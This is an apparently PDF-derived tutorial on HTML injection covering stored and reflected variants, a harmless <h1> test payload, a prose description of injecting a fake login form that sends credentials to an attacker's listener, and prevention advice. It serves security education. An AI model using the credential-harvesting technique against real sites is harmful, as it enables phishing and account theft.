HTML Injection
In order to understand What is HTML injection, first of all we
need to know the basics of HTML.
HTML is the abbreviation for Hyper Text Markup Language.It's a
markup language that is used to create web pages along with css
and javascript to make web page attractive and interactive.
In HTML , the term hyperlink refers to links between the
webpages.
HTML is a markup language , that is used by browser to
manipulate or show text,images and content in a serialized format
, and here assisted technologies CSS (Cascading Style Sheets) is
used to add design,colour or style while javascript made your
webpage interactive.
HTML document is made of many HTML tags, and each html
tags contains different content.
1
�To develop any website HTML,CSS and javascript is very
important.
HTML Injection Vulnerability
HTML is a type of injection vulnerability occurs when the user
is able to control input and can inject any arbitary / random
HTML code into a vulnerable web page.
This type of vulnerability occurs when the user input is not
santitized and output is not enocoded , an injection allows the
attacker to send malicious HTML page to a victim and it a some
form of social engineering as the attack is exploiting code based
vulnerability and user's trust.
The main reason for HTML injection vulnerability is a improper
use input validation and sanitization and output is not properly
encoded.
In XSS scripts are executed while in HTML injection , malicious
HTML tags,payloads are used.
2
�Types of HTML Injection Attacks
1. Stored HTML injection
2. Reflected HTML injection
1.Stored HTML injection
Stored HTML injection attack occurs when the attacker is able to
store/inject any malicious HTML code in the webserver , and it
can be exploited by the victim's browser everytime whenever he
calls an appropriate functonality.
for e.g., the attacker is injected/stored HTML code in the user's
registration page , and it is exploited by the user's browsers
whenever he enters credentials in the registration page , and the
attacker can easily obtain sensitive info of user such as cookie ,
session info and user credentials and many more.
the most common example of Stored HTML is "Comment
Option" where the user/administrator can type anything and gets
stored in server.
Another example would be feedback, blog, etc wherever the user
can save his input in the server.
3
�2.Reflected HTML injection
Unlike stored injections, reflected attacks are not permanently
housed on the server. Instead, they trick users into executing
malicious code via a URL. This is often achieved through
phishing emails or messages that lure users into clicking on a
compromised link.
There are mainly three types of Reflected HTML injections are
there:
1. Reflected HTML GET
2. Reflected HTML POST
3. Reflected HTML URL
Example of Reflected HTML GET
Let’s say there is an application which is hosting a form where
user can insert
first & last name and it reflects the entered input on the webpage.
Let’s try to check if it is accepting HTML tags or not –
We are injecting <h1> tags in the first name parameter and the
response we get from doing this is also shown below.
4
� Output
As we can see, our payload got executed successfully, so we can
increase the impact by injecting a malicious link and when victim
clicks on that link, he/she will be taken to attacker’s website and
now we can perform more attacks.
Example of Stored HTML injection
Let’s say there is an application where we can write and store
blogs. So,
simply we can store the user input here.
Let’s try to inject below input in this application.
<h1> Hello guys, let's talk about HTML injection..!! </h1>
5
� So, now we know that this is vulnerable to stored HTML
injection and now if any user visits this vulnerable webpage, this
HTML code will be rendered by their browser and this string will
be present on their webpage too.
Let’s try to increase the impact and upload a malicious login
form.
If victim trusts this vulnerable domain, then he/she will put the
credentials and attacker will get the credentials on its website or
listener port.
Following malicious code can be submitted in the field for
creating form.
In the code above, we have action field which contains the
attacker’s location where the credentials will be sent when victim
submits the credentials.
Now, set up a listener in the same IP address with the same port
number
6
�Now, victim visits the webpage and submits the credentials
And, attacker gets the credentials on the listener like this
Common Attack scenerio
1. Identify the injection in the webpage.
2. Craft a malicious link, including the malicious HTML
content and send to victim via email.
3. Now due to trust over the target domain,victim will visit that
page.
4. The attackers injected HTML is rendered and presented to
the user asking for a username and password.
5. The user enters a username and password which are both
sent to the attacker’s server.
7
�Impacts of HTML injection
Attacker can exploit HTML injection to run some personal
agenda or any advertisement of some product they want to
sell or just defaming the website.
Attacker can host a fake login form and hence the form data
submitted by the victim will be sent to the attacker’s server.
Attacker may also hijack HTML forms by injecting their
own <form> tag before the legitimate
<form> tag. This will work because the top-level form tag
will be given precedence.
Attacker can exfiltrate anti-CSRF token.
How to prevent HTML injection?
➢ Application should escape all of the HTML tags from the
user input.
➢ In case, the application by design, asks user to include the
user input then White-list based filters can be used.
➢ Blacklist-based filters should be avoided as these are prone
to bypasses.
➢ A good Web Application Firewall (WAF) can also be used to
prevent these kind of injection attacks.
8
�Why HTML injection is different from XSS?
HTML Injection is an attack that is similar to cross-site scripting
(XSS).While in the XSS vulnerability the attacker can inject and
execute JavaScript Code, the HTML Injection attack only allows
the injection of certain HTML tags. When an Application does
not properly handle user supplied data, an attacker can supply
valid HTML code, typically via a parameter value, and inject
their own content into the page. This attack is typically used in
conjunction with some form of social engineering , as the attack
is exploiting a code-based vulnerability and mainly a user’s trust.
● In XSS attacks, various types of payloads can be injected
but the end goal is to execute JavaScript code only and
execute JS code can have huge impacts.
● But here we are only executing HTML code and hence it has
its limitations.
● If we can chain this vulnerability with other vulnerabilities
like CSRF then we can have critical impact also.
References
➔ https://owasp.org/www-project-web-security-testing-guide/
latest/4-Web_Application_Security_Testing/11-Client-
side_Testing/03-Testing_for_HTML_Injection
➔ https://www.acunetix.com/blog/web-security-zone/html-
injections/
➔ https://www.imperva.com/learn/application-security/html-
injection/
➔ https://bard.google.com/
